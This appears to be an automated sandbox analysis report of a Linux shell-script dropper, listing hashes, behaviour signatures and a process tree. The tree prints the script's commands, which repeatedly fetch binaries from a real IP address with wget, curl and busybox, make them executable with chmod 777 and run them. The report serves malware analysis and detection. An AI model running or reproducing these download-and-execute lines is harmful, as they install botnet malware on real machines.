Analysis
-
max time kernel
18s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28/10/2024, 02:34
Static task
static1
Behavioral task
behavioral1
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
-
Size
10KB
-
MD5
7b4d271e102cd41b604d6fea5d979e2d
-
SHA1
56b5d99bae8b5353d96d700fda3d30d396cc9828
-
SHA256
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91
-
SHA512
ac1884092a54f7829359fccf4958bfc2add2cc2a89006fc0fadd30221a55d9c559a91e0a83747d00161c63e152fef77f819c20574cbd81fb4bdde05f1ed486c5
-
SSDEEP
192:C83Wep8P79w808A8uBpzuRtUltYv3WfjIK3qRtUlta808A8uBpKv3WfjaB83hP7W:Crep8P79w808A8uBpzyv3WfjIK38808f
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1609 chmod 1621 chmod 1675 chmod 1627 chmod 1543 chmod 1549 chmod 1555 chmod 1585 chmod 1663 chmod 1657 chmod 1531 chmod 1567 chmod 1597 chmod 1633 chmod 1639 chmod 1645 chmod 1651 chmod 1513 chmod 1519 chmod 1591 chmod 1525 chmod 1615 chmod 1573 chmod 1537 chmod 1561 chmod 1579 chmod 1603 chmod 1669 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms 1514 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt 1520 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF 1526 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs 1532 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa 1538 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB 1544 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S 1550 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo 1556 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K 1562 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f 1568 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU 1574 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD 1580 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF 1586 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 1592 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K 1598 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f 1604 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU 1610 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo 1616 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF 1622 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 1628 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD 1634 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt 1640 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF 1646 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs 1652 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa 1658 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms 1664 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB 1670 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S 1676 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1564 wget 1565 curl 1600 wget 1605 rm 1566 busybox 1568 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f 1569 rm 1601 curl 1602 busybox 1604 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms curl File opened for modification /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K curl File opened for modification /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 curl File opened for modification /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K curl File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S curl File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt curl File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF curl File opened for modification /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF curl File opened for modification /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD curl File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms curl File opened for modification /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD curl File opened for modification /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo curl File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs curl File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa curl File opened for modification /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU curl File opened for modification /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU curl File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB curl File opened for modification /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo curl File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs curl File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S curl File opened for modification /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF curl File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt curl File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF curl File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa curl File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB curl File opened for modification /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f curl File opened for modification /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f curl File opened for modification /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 curl
Processes
-
/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh1⤵PID:1505
-
/bin/rm/bin/rm bins.sh2⤵PID:1506
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:1507
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Writes file to tmp directory
PID:1508
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:1509
-
-
/bin/chmodchmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Executes dropped EXE
PID:1514
-
-
/bin/rmrm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:1515
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:1516
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:1518
-
-
/bin/chmodchmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Executes dropped EXE
PID:1520
-
-
/bin/rmrm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:1521
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:1524
-
-
/bin/chmodchmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:1527
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:1530
-
-
/bin/chmodchmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Executes dropped EXE
PID:1532
-
-
/bin/rmrm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:1533
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:1534
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:1536
-
-
/bin/chmodchmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Executes dropped EXE
PID:1538
-
-
/bin/rmrm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:1539
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:1540
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:1542
-
-
/bin/chmodchmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Executes dropped EXE
PID:1544
-
-
/bin/rmrm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:1545
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:1546
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:1548
-
-
/bin/chmodchmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Executes dropped EXE
PID:1550
-
-
/bin/rmrm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:1551
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:1552
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:1554
-
-
/bin/chmodchmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Executes dropped EXE
PID:1556
-
-
/bin/rmrm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:1557
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:1560
-
-
/bin/chmodchmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:1563
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:1564
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1565
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:1566
-
-
/bin/chmodchmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1568
-
-
/bin/rmrm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:1569
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:1570
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Writes file to tmp directory
PID:1571
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:1572
-
-
/bin/chmodchmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Executes dropped EXE
PID:1574
-
-
/bin/rmrm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:1575
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:1576
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:1578
-
-
/bin/chmodchmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Executes dropped EXE
PID:1580
-
-
/bin/rmrm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:1581
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:1582
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:1584
-
-
/bin/chmodchmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Executes dropped EXE
PID:1586
-
-
/bin/rmrm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:1587
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:1588
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Writes file to tmp directory
PID:1589
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:1590
-
-
/bin/chmodchmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- File and Directory Permissions Modification
PID:1591
-
-
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Executes dropped EXE
PID:1592
-
-
/bin/rmrm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:1593
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:1594
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Writes file to tmp directory
PID:1595
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:1596
-
-
/bin/chmodchmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- File and Directory Permissions Modification
PID:1597
-
-
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Executes dropped EXE
PID:1598
-
-
/bin/rmrm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:1599
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:1600
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1601
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:1602
-
-
/bin/chmodchmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- File and Directory Permissions Modification
PID:1603
-
-
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1604
-
-
/bin/rmrm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:1605
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:1606
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:1608
-
-
/bin/chmodchmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Executes dropped EXE
PID:1610
-
-
/bin/rmrm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:1611
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:1612
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:1614
-
-
/bin/chmodchmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Executes dropped EXE
PID:1616
-
-
/bin/rmrm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:1617
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:1618
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Writes file to tmp directory
PID:1619
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:1620
-
-
/bin/chmodchmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- File and Directory Permissions Modification
PID:1621
-
-
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Executes dropped EXE
PID:1622
-
-
/bin/rmrm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:1623
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:1624
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Writes file to tmp directory
PID:1625
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:1626
-
-
/bin/chmodchmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- File and Directory Permissions Modification
PID:1627
-
-
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Executes dropped EXE
PID:1628
-
-
/bin/rmrm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:1629
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:1630
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Writes file to tmp directory
PID:1631
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:1632
-
-
/bin/chmodchmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- File and Directory Permissions Modification
PID:1633
-
-
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Executes dropped EXE
PID:1634
-
-
/bin/rmrm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:1635
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:1636
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Writes file to tmp directory
PID:1637
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:1638
-
-
/bin/chmodchmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- File and Directory Permissions Modification
PID:1639
-
